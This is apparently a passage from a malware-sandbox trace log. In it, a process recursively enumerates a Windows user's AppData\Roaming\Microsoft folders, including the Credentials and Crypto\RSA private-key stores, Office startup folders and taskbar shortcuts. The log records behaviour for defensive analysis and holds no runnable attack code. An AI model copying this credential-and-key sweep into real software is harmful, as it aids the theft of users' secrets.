returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0083.608] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.608] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.608] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.608] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.608] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.608] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Crypto" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto" [0083.608] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0083.608] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.609] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.609] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.609] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="RSA" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0083.609] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0083.609] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.609] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.609] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.609] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="S-1-5-21-2345716840-1148442690-1481144037-1000" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000" [0083.609] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*" [0083.609] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.609] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.609] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.609] PathMatchSpecW (pszFile="83aa4cc77f591dfc2374580bbd95f6ba_500c0908-381e-49dc-a6a0-1a800e9a56e0", pszSpec="*") returned 1 [0083.609] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.609] PathMatchSpecW (pszFile="8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0", pszSpec="*") returned 1 [0083.609] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.609] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.610] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.610] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.610] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.610] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.610] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.610] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Document Building Blocks" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0083.610] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0083.610] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.610] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.610] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.610] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0083.610] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0083.610] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.610] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.610] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.610] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0083.610] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" [0083.610] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.610] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.611] PathMatchSpecW (pszFile="Built-In Building Blocks.dotx", pszSpec="*") returned 1 [0083.611] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.611] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.611] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.611] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.611] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Excel" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel" [0083.611] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*" [0083.611] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.611] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.611] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel", pszFile="XLSTART" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0083.611] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0083.611] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.611] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.611] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.611] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.611] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IME12" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12" [0083.611] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*" [0083.611] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.611] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.611] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.611] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.612] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.612] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP12" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12" [0083.612] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*" [0083.612] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.612] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.612] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.612] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.612] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.612] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP8_1" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1" [0083.612] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*" [0083.612] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.612] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.612] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.612] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.612] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.612] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP9_0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0" [0083.612] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*" [0083.612] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.612] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.612] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.612] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.612] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.612] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Internet Explorer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0083.612] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0083.612] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.612] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.612] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.612] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="Quick Launch" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0083.612] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0083.612] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.613] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.613] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.613] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.613] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.613] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0083.613] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.613] PathMatchSpecW (pszFile="Launch Internet Explorer Browser.lnk", pszSpec="*") returned 1 [0083.613] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.613] PathMatchSpecW (pszFile="Microsoft Outlook.lnk", pszSpec="*") returned 1 [0083.613] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.613] PathMatchSpecW (pszFile="Shows Desktop.lnk", pszSpec="*") returned 1 [0083.613] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.613] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="User Pinned" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0083.613] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0083.613] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.613] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.613] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.613] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="ImplicitAppShortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0083.613] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0083.613] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.613] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.613] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.613] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.613] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.613] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="TaskBar" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0083.613] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0083.613] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Excel 2016.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Internet Explorer (2).lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Internet Explorer.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Mozilla Firefox.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="OneNote 2016.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Outlook 2016.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="PowerPoint 2016.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Project 2016.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW 